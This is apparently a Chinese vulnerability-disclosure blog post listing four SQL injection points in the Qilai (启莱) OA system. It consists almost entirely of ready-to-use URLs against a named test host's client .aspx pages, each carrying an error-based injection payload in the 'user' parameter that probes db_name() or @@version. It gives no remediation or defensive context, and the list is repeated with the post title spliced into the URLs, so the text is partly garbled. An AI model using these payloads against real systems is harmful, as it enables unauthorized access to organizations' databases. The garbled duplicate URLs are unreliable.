启莱OA系统sql注入4处

  • A+
所属分类:漏洞时代
摘要

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=’ and (select db_name())>0–&pwd=1

注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=’ and (select db_name())>0–&pwd=1

注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=’ and @@version>0–

注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=’ and @@version>0–&

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
启莱OA系统sql注入4处
注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
启莱OA系统sql注入4处
注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=' and @@version>0--
启莱OA系统sql注入4处
注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=' and @@version>0--&启莱OA系统sql注入4处

启莱OA系统sql注入4处pwd=a

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: